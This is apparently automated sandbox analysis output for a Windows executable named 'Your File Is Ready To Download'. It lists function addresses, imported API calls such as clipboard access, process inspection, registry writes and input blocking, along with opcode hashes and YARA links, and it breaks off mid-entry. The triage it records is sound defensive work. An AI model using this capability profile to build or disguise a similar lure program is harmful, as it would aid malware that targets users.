UTF-16LE, xrefs: 00000001400D148C
=, xrefs: 00000001400D1455
ccs, xrefs: 00000001400D1428

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$_wsopen_s
String ID: =$UNICODE$UTF-16LE$UTF-8$ccs
API String ID: 2449612375-31882262
Opcode ID: aa7a12e72c13116635aa1623b80d006e0e346e78ba8ba9d0c45dd25e91760610
Instruction ID: 57a6b2f1bf53cd05b3f187f2342c899ece12a22dbe3ce9a5bad801dbc9e3026f
Opcode Fuzzy Hash: aa7a12e72c13116635aa1623b80d006e0e346e78ba8ba9d0c45dd25e91760610
Instruction Fuzzy Hash: 66712D76A04240A1FB774E27A8107FE2691AFDCBD4F294111FF0653AF4DE39CA838261

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400CA474, Relevance: 13.6, APIs: 9, Instructions: 61COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00000001400CA491

Part of subcall function 00000001400C8F74: _FF_MSGBANNER.LIBCMT ref: 00000001400C8FA4
Part of subcall function 00000001400C8F74: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400CF264,?,?,00000000,00000001400CDBCD,?,?,?,00000001400CDC77,?,?,00000000,00000001400CD065), ref: 00000001400C8FC9
Part of subcall function 00000001400C8F74: _callnewh.LIBCMT ref: 00000001400C8FE2
Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FED
Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FF8

_errno.LIBCMT ref: 00000001400CA512
GetLastError.KERNEL32(?,?,00000020,00000001400CF368,?,?,00000000,00000001400C9B3B,?,?,?,00000001400C9BA9), ref: 00000001400CA51A
_errno.LIBCMT ref: 00000001400CA52B
GetLastError.KERNEL32(?,?,00000020,00000001400CF368,?,?,00000000,00000001400C9B3B,?,?,?,00000001400C9BA9), ref: 00000001400CA533

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _errno$ErrorLast$AllocateHeap_callnewhmalloc
String ID:
API String ID: 2313257140-0
Opcode ID: df69ee0ac742230fd0f5d7fba57e7025a48f7b21153ff07a80e1cce079a02a27
Instruction ID: 5d4adb930a3fe504eaf07c5d5ce1c9aea23c8394e19cf97002ba77b85ecb821d
Opcode Fuzzy Hash: df69ee0ac742230fd0f5d7fba57e7025a48f7b21153ff07a80e1cce079a02a27
Instruction Fuzzy Hash: 6E21937060CB4185FE5FAB23A4043DD72915B8EBE8F048635BB2B473F6EA3CC4419211

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140032F74, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 352windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045

Strings

Jumps cannot exit a FINALLY block., xrefs: 000000014003861F

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: ClipboardCloseCountGlobalMessagePeekTickUnlock
String ID: Jumps cannot exit a FINALLY block.
API String ID: 1792675829-672026804
Opcode ID: 41e7c0198bf41557c356dafb56d4c7e000fc85092e23f3702e4a8e943bcda5df
Instruction ID: acd322ca1d214134ac5d7f649de08a70bb7a93da2d57ee0a30aea2ec5953ced4
Opcode Fuzzy Hash: 41e7c0198bf41557c356dafb56d4c7e000fc85092e23f3702e4a8e943bcda5df
Instruction Fuzzy Hash: A9024936604B408AFB6B8B26E8943EA77A1F74DBD4F544126EF4947BB5DB38D881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140032D25, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400CA630: malloc.LIBCMT ref: 00000001400CA64A

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059

Strings

Out of memory., xrefs: 0000000140032E00

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlockmalloc
String ID: Out of memory.
API String ID: 425479435-4087320997
Opcode ID: f814e87adf314a6b31eb7cef9c6a33aed5fb67d2c8ac3dfd047589991c6e8d9d
Instruction ID: 066eb817c3b70d7be61ae7bb2b88a7c2218743c3ee24c41251c2c0eb0bcbb7e8
Opcode Fuzzy Hash: f814e87adf314a6b31eb7cef9c6a33aed5fb67d2c8ac3dfd047589991c6e8d9d
Instruction Fuzzy Hash: BFC13932604B408AEB6B8B26E8803EA77A1F78DBD4F544116EF5A47BF5DB38D485C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140032AD1, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 224windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400C8EEC: _errno.LIBCMT ref: 00000001400C8F04
Part of subcall function 00000001400C8EEC: _invalid_parameter_noinfo.LIBCMT ref: 00000001400C8F0F

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059

Strings

CSV, xrefs: 0000000140032AD1

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
String ID: CSV
API String ID: 130734711-2651001053
Opcode ID: 572362767ad768163867fa68cd7a9e50fc59bdb1ac0e55caaa0b24eb0c1dbfb6
Instruction ID: d9f78cd69f3e77be8d0fec39935b13639e45971fedc057a2c93a66f3b9424bab
Opcode Fuzzy Hash: 572362767ad768163867fa68cd7a9e50fc59bdb1ac0e55caaa0b24eb0c1dbfb6
Instruction Fuzzy Hash: 03B11972604B448AEB6B8B27E8403DA77A1F78DBD4F504116EB5987BF5DB38D881C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003700E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 186windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059

Part of subcall function 00000001400C8EEC: _errno.LIBCMT ref: 00000001400C8F04
Part of subcall function 00000001400C8EEC: _invalid_parameter_noinfo.LIBCMT ref: 00000001400C8F0F

Strings

wait, xrefs: 000000014003701B

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
String ID: wait
API String ID: 130734711-2112783333
Opcode ID: 7c4ed165d9e2ba37012e234b23c9867010eebace0702a350253cd31f9b522e7d
Instruction ID: cf1d5aa5b94b8c21c0170df4a327b226c7bfbf8668e7474b45d94d604f431d61
Opcode Fuzzy Hash: 7c4ed165d9e2ba37012e234b23c9867010eebace0702a350253cd31f9b522e7d
Instruction Fuzzy Hash: F1914631604B4086FB6B8B27E8447EA77A2A78DBD4F544116EB598BAF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140078B30, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000000140078B60
OpenProcess.KERNEL32 ref: 0000000140078B78
K32GetModuleBaseNameW.KERNEL32 ref: 0000000140078BA5
GetModuleFileNameExW.PSAPI ref: 0000000140078BAD
QueryDosDeviceW.KERNEL32 ref: 0000000140078C53
CloseHandle.KERNEL32 ref: 0000000140078CCC

Strings

:, xrefs: 0000000140078C2D

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: ModuleNameOpenProcess$BaseCloseDeviceFileHandleQuery
String ID: :
API String ID: 1931077953-336475711
Opcode ID: 573a37ad16254d65a57e21730c3533045b0e8a963b408c0b4df3915bd6594c49
Instruction ID: 22f51d6e5974e33ba1858768ee294a42fa7c76c1007ef709756bf7c5cb430c9d
Opcode Fuzzy Hash: 573a37ad16254d65a57e21730c3533045b0e8a963b408c0b4df3915bd6594c49
Instruction Fuzzy Hash: B541BE76305B8181EB76AB23A8043EA6391FB8CBD5F484225AF59477A8EF3CC445C764

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140032B8D, Relevance: 10.8, APIs: 7, Instructions: 260clipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
GetCPInfo.KERNEL32 ref: 0000000140032BD9

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: ClipboardCloseCountGlobalInfoTickUnlock
String ID:
API String ID: 3668674636-0
Opcode ID: d919db4b3003787f4fd321d3ed34bff5e1cc9ebfae758f0bf38b202e11dd4bd0
Instruction ID: 010424c8725794da4d9d843b7715fc1e3d34d848acf92ec9fef2cc870f8aac1c
Opcode Fuzzy Hash: d919db4b3003787f4fd321d3ed34bff5e1cc9ebfae758f0bf38b202e11dd4bd0
Instruction Fuzzy Hash: FBD14D32601B8089EB768F26E8407DA77A2F74DB94F504216EB594BBF5DB38C585C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140032E26, Relevance: 10.7, APIs: 7, Instructions: 230registrywindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
RegCloseKey.ADVAPI32 ref: 0000000140032ECD

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CloseCountTick$ClipboardGlobalMessagePeekUnlock
String ID:
API String ID: 4107439908-0
Opcode ID: 0f4eacce32dbb7fabd4fa376f7d557669b0d157d38553d8343a4a07b158c1fcb
Instruction ID: f644155ad8b0ff2c6bb41787198a4f16e305ea69178ea5da921999b77e6d4863
Opcode Fuzzy Hash: 0f4eacce32dbb7fabd4fa376f7d557669b0d157d38553d8343a4a07b158c1fcb
Instruction Fuzzy Hash: 3EB14C32605B848AEB6B8B27E8803DA77A1F78DBD4F504116EF5947BB5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003825A, Relevance: 10.7, APIs: 7, Instructions: 217registrywindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
RegCloseKey.ADVAPI32 ref: 000000014003824B

Part of subcall function 00000001400A8720: RegCreateKeyExW.ADVAPI32 ref: 00000001400A879C
Part of subcall function 00000001400A8720: RegCloseKey.ADVAPI32 ref: 00000001400A8A75
Part of subcall function 00000001400A8720: GetLastError.KERNEL32 ref: 00000001400A8A84

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Close$CountTick$ClipboardCreateErrorGlobalLastMessagePeekUnlock
String ID:
API String ID: 2674141723-0
Opcode ID: 3cbbc759a658de586b3d9575b0f8f4a01f477f5facff7aebc56bdd8a9801fe21
Instruction ID: af8cba61bfda31093be1265673fdc127feffaa00a6ee02027973cf77dae56663
Opcode Fuzzy Hash: 3cbbc759a658de586b3d9575b0f8f4a01f477f5facff7aebc56bdd8a9801fe21
Instruction Fuzzy Hash: 99B13971604B4086FB6B8B27A8443EA77A2F78DBD4F544116EF9947AF9DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400381B8, Relevance: 10.7, APIs: 7, Instructions: 203registrywindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
RegCloseKey.ADVAPI32 ref: 000000014003824B

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CloseCountTick$ClipboardGlobalMessagePeekUnlock
String ID:
API String ID: 4107439908-0
Opcode ID: 8f6ab087895ee3c05e0ec830718a5b746441a02ff7311cda8f0839cd1fe797df
Instruction ID: 5decb646e76f49f065ce2617e64a23d77cc80f421ff3e23c34fd2cff9f42f85e
Opcode Fuzzy Hash: 8f6ab087895ee3c05e0ec830718a5b746441a02ff7311cda8f0839cd1fe797df
Instruction Fuzzy Hash: B4A15871604B4086FB6B8B27A8443EA77A2F78DBD4F544116EF5947AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037209, Relevance: 10.7, APIs: 7, Instructions: 194filewindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
MoveFileW.KERNEL32 ref: 000000014003722C

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseFileGlobalMessageMovePeekUnlock
String ID:
API String ID: 1818255640-0
Opcode ID: fc4132aee4dbab13f23e380e22ac67cc336da6469f6ce733df4ea00b5c8bfd6f
Instruction ID: 340df088fe35520b7c01f37ad8eb0e8363d8ae234b43410862286bb96c324202
Opcode Fuzzy Hash: fc4132aee4dbab13f23e380e22ac67cc336da6469f6ce733df4ea00b5c8bfd6f
Instruction Fuzzy Hash: B5914831604B4086FB6B8B27A8943EA77A2B78DBD4F544116EB5947AF6DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036FAC, Relevance: 10.7, APIs: 7, Instructions: 188windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
Beep.KERNEL32 ref: 0000000140037003

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$BeepClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 3141429382-0
Opcode ID: ec1f7698742971c684fcce923c59e07ce5e671a850b3ba8c006df2acb425b72b
Instruction ID: 7d649e32d9fb6d21ea2179a32977a2d4ce6375240ea52ac391409dd76d458351
Opcode Fuzzy Hash: ec1f7698742971c684fcce923c59e07ce5e671a850b3ba8c006df2acb425b72b
Instruction Fuzzy Hash: 28915C31600B4086FB6B8B2BA8443EA77A2F78DBD4F544116FB5A876F5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400366F9, Relevance: 10.7, APIs: 7, Instructions: 183windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400673E0: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000001400483D2), ref: 0000000140067413
Part of subcall function 00000001400673E0: IsWindowVisible.USER32 ref: 0000000140067434

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127
SetWindowTextW.USER32 ref: 0000000140036727

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTickWindow$ClipboardCloseForegroundGlobalMessagePeekTextUnlockVisible
String ID:
API String ID: 1043259673-0
Opcode ID: 897bb3d8117c7bc7f186c42cc8fd60b17f33fd6da02fd5b8ce4390268177136b
Instruction ID: 3be0bed3be6027fe7d3f3789635846199c564c518d246570e3b72a4739cc78c0
Opcode Fuzzy Hash: 897bb3d8117c7bc7f186c42cc8fd60b17f33fd6da02fd5b8ce4390268177136b
Instruction Fuzzy Hash: 6D914831604B4086FB6B8B27A8443EA77A2F78DBD4F544216EF5947AF6DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400370E4, Relevance: 10.7, APIs: 7, Instructions: 180windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127
SHEmptyRecycleBinW.SHELL32 ref: 00000001400370FC

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseEmptyGlobalMessagePeekRecycleUnlock
String ID:
API String ID: 2387848762-0
Opcode ID: 8b89c53ab6f510f642ce9ff566a8d318d76e330f6ef9892c23bdc1f868e4ffc7
Instruction ID: 30e7dd8c001efbd768e4b9709394bec6ca90854a641c2b8706f04807ca2cf74c
Opcode Fuzzy Hash: 8b89c53ab6f510f642ce9ff566a8d318d76e330f6ef9892c23bdc1f868e4ffc7
Instruction Fuzzy Hash: 14913A31604B4086FB6B8B27E8443EA77A2F78DBD4F544116EB5A87AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038046, Relevance: 10.7, APIs: 7, Instructions: 167keyboardwindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127
BlockInput.USER32 ref: 000000014003804D

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
